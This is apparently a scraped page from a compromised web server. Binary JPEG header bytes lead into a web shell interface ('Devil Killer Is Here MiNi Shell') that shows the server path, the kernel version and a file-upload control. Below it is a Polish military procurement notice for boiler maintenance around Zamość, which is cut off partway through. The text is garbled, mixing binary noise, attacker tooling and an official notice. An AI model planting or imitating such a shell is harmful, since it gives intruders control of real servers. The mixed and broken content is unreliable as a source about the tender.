JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241128/0062150101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa konserwacji, przeglądów oraz napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, olejowych, kotłów warzelnych oraz parowych w zakresie 5 (pięciu) części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">32 Wojskowy Oddział Gospodarczy w Zamościu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 061402337</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojska Polskiego 2F</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zamość</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">261181536</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">261181607</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">32wog.zampub@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.32wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Wojskowa Jednosta Budżetowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa konserwacji, przeglądów oraz napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, olejowych, kotłów warzelnych oraz parowych w zakresie 5 (pięciu) części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bdd3b385-41ea-4e9b-8cf6-c706bd6dc7af</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00621501</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00239066/30/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Konserwacja, serwis i przeglądy kotłowni olejowych, gazowych oraz kotłów gazowych warzelnych w RO</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/32wog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/32wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Środkiem komunikacji elektronicznej, służącym złożeniu przez Wykonawcę oferty jest platforma zakupowa https://platformazakupowa.pl/pn/32wog<br/>Komunikacja w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy - platformazakupowa.pl i formularza „Wyślij wiadomość” znajdującego się na stronie danego postępowania. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „ Wyślij wiadomość” po którym pojawi się komunikat, iż wiadomość została wysłana do Zamawiającego. (sposób komunikowania się Zamawiającego z Wykonawcami – nie dotyczy składania ofert i wniosków, gdyż wiadomości nie są szyfrowane). Zamawiający będzie przekazywał informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.: a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c)zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0., d)	włączona obsługa JavaScript, e)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików pdf, f)	Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, g)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności , gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta zostanie uznana za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie Internetowej Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o.o. (https://platformazakupowa.pl/strona/1-regulamin ). Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych I w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), dalej “RODO”, Zamawiający informuje, że: <br/>1)	Administratorem Pani/Pana danych osobowych jest 32 Wojskowy Oddział Gospodarczy w Zamościu, ul. Wojska Polskiego 2F, 22 – 400 Zamość;<br/>2)	Inspektor ochrony danych osobowych w 32 Wojskowym Oddziale Gospodarczym w Zamościu kontakt e-mail: 32wog.iodo@ron.mil.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pod nazwą: Usługa konserwacji, przeglądów, pogotowia technicznego oraz wykonywanie napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, kotłowni olejowych, kotłów warzelnych oraz parowych w kompleksach wojskowych w miejscowości Lublin, Jawidz , Zamość, Hrubieszów, Chełm – w zakresie 5 (pięciu) części. Nr sprawy ZP/TP/85/2024, prowadzonym w trybie art. 275 pkt 1) ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2024r., poz. 1320 t. j.)<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2024r. poz. 1320 t. j.), dalej „ustawa Pzp”; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/TP/85/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: usługa konserwacji, przeglądów, pogotowia technicznego oraz wykonywanie napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, kotłowni olejowych, kotłów warzelnych oraz parowych w kompleksach wojskowych w miejscowości Lublin, Jawidz , Zamość, Hrubieszów, Chełm – w zakresie 5 (pięciu) części:<br/>•	Cześć Nr 1 konserwacje, przeglądy na terenie komp. w m. LUBLIN<br/>•	Część Nr 2 konserwacje, przeglądy na terenie komp. w m. Jawidz<br/>•	Część Nr 3 konserwacje, przeglądy na terenie komp. w m. ZAMOŚĆ<br/>•	Część Nr 4 konserwacje, przeglądy na terenie komp. w m. Hrubieszów<br/>•	Część Nr 5 konserwacje, przeglądy na terenie komp. w m. CHEŁM<br/><br/>Nr sprawy ZP/TP/85/2024.<br/>Kod CPV – 508 00000-3 Różne usługi w zakresie napraw i konserwacji.<br/><br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA<br/><br/>Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1, części nr 2, części nr 3, części nr 4, części nr 5, określają:<br/>1)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1 – stanowiący Załącznik nr 1a do SWZ;<br/>2)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 2 – stanowiący Załącznik nr 1b do SWZ;<br/>3)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 3 – stanowiący Załącznik nr 1c do SWZ;<br/>4)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 4 – stanowiący Załącznik nr 1d do SWZ;<br/>5)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 5 – stanowiący Załącznik nr 1e do SWZ;<br/><br/>UWAGA! Zamawiający zamieścił powyższe załączniki, tj.: szczegółowe opisy przedmiotu zamówienia w zakresie części nr 1, 2, 3, 4, 5, spakowane <br/>w jednym pliku w formacie ZIP, który został zamieszczony na platformie zakupowej w zakładce „Załączniki do postępowania” jako załącznik nr 1 do SWZ. <br/><br/>7.	Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (Dz. U. z 2023 r. poz.1465 tekst jednolity z późniejszymi zmianami) - stosownie do postanowień art. 95, art. 96, art. 438 Pzp:<br/><br/>1)	Wykonawca zobowiązuje się przed podpisaniem Umowy lub w terminie 7 dni kalendarzowych od chwili powstania obowiązku zatrudnienia pracowników na podstawie Umowy o pracę i na każde żądanie Zamawiającego dostarczyć Zamawiającemu Wykaz osób przewidzianych do realizacji Umowy z uwzględnieniem imienia i nazwiska, stanowiska, rodzaju umowy o pracę oraz okres na jaki została zawarta (wzór wykazu stanowi załącznik do niniejszej umowy). Wykaz ten będzie stanowił integralną część Umowy. Ww. obowiązek dotyczy także Podwykonawców.<br/><br/>2)	Wykonawca lub Podwykonawca (w przypadku realizacji zamówienia przy udziale podwykonawców) jest zobowiązany zatrudnić na podstawie umowy o pracę określonej w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz.U. z 2023r. poz. 1465 z późn. zm.) pracowników, którzy w okresie realizacji Umowy będą wykonywać czynności, tj.:<br/><br/>	Wykonawca świadczący usługę powinien zatrudnić na podstawie umowy o pracę osoby bezpośrednio związane z realizacją umowy, czyli osoby dokonujące przeglądów i konserwacji oraz wykonujące montaż i demontaż jak i naprawy awaryjne i eksploatacyjne urządzeń i instalacji kotłowni gazowych, kotłów warzelnianych i parowych. Wykonujących pomiary w zakresie instalacji elektrycznej, gazowej wg. obowiązujących norm i przepisów. <br/><br/>3)	Uprawnienia Zamawiającego w zakresie kontroli spełnienia przez Wykonawcę wymogu zatrudnienia w/w osób na podstawie umowy o pracę oraz sankcji z tytułu niespełnienia tych wymagań zostały określone we wzorze umowy stanowiącym załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">w zakresie część nr 1, 2, 3, 4, 5:<br/><br/>1)	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	waga 60 % – Cena wartość wynagrodzenia za konserwacje i przeglądy <br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/>	waga 20 % - Marża - dodanej do wartości zakupu części i materiałów użytych do napraw awaryjnych oraz eksploatacyjnych<br/><br/>Zasady oceny ofert w poszczególnych kryteriach:<br/>	waga 60 % – Cena - wartość wynagrodzenia za konserwacje i przeglądy <br/> <br/>liczone według wzoru:<br/><br/> C min <br/> C o = ---------- x 100 x 60 %<br/> C B<br/>C o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium ceny 60 % <br/>C min – najniższa zaproponowana cena wśród ofert niepodlegających odrzuceniu <br/>C B - zaproponowana cena oferty badanej<br/><br/>	waga 20% – Cena roboczogodziny – dla napraw awaryjnych i eksploatacyjnych <br/><br/> C r.min <br/>C r = ---------- x 100 x 20 %<br/> C r.of.<br/><br/>C r - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium roboczogodzina 20 % C r.min – najniższa zaproponowana roboczogodzina wśród ofert niepodlegających odrzuceniu<br/>C r.of.- zaproponowana cena roboczogodziny w badanej ofercie <br/><br/><br/>	waga 20 % - Marża <br/><br/> M min <br/>M o = ---------- x 100 x 20 %<br/> M of. <br/><br/>M o - liczba punktów uzyskanych przez ofertę badaną ( po zaokrągleniu do dwóch miejsc po przecinku)w kryterium marża 20 % M min – najniższa zaproponowana marża wśród ofert niepodlegających odrzuceniu<br/>M of. - zaproponowana wartość marży w badanej ofercie <br/><br/>UWAGA: W przypadku niewskazania w ofercie marży w ogóle – oferta zostanie odrzucona.<br/><br/>Sposób wyboru najkorzystniejszej oferty:<br/><br/>Najkorzystniejsza oferta = oferta z największą liczbą punktów LP<br/>LP = CO + C r + M o <br/>gdzie: LP – wyliczona ilość punktów badanej oferty</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">cena roboczogodziny dla napraw awaryjnych i ekspolatacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">marża</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: usługa konserwacji, przeglądów, pogotowia technicznego oraz wykonywanie napraw awaryjnych w zakresie urządzeń i instalacji kotłowni gazowych, kotłowni olejowych, kotłów warzelnych oraz parowych w kompleksach wojskowych w miejscowości Lublin, Jawidz , Zamość, Hrubieszów, Chełm – w zakresie 5 (pięciu) części:<br/>•	Cześć Nr 1 konserwacje, przeglądy na terenie komp. w m. LUBLIN<br/>•	Część Nr 2 konserwacje, przeglądy na terenie komp. w m. Jawidz<br/>•	Część Nr 3 konserwacje, przeglądy na terenie komp. w m. ZAMOŚĆ<br/>•	Część Nr 4 konserwacje, przeglądy na terenie komp. w m. Hrubieszów<br/>•	Część Nr 5 konserwacje, przeglądy na terenie komp. w m. CHEŁM<br/><br/>Nr sprawy ZP/TP/85/2024.<br/>Kod CPV – 508 00000-3 Różne usługi w zakresie napraw i konserwacji.<br/><br/>SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA<br/><br/>Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1, części nr 2, części nr 3, części nr 4, części nr 5, określają:<br/>1)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 1 – stanowiący Załącznik nr 1a do SWZ;<br/>2)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 2 – stanowiący Załącznik nr 1b do SWZ;<br/>3)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 3 – stanowiący Załącznik nr 1c do SWZ;<br/>4)	Szczegółowy opis przedmiotu zamówienia w zakresie części nr 4 – stanowiący Załącznik 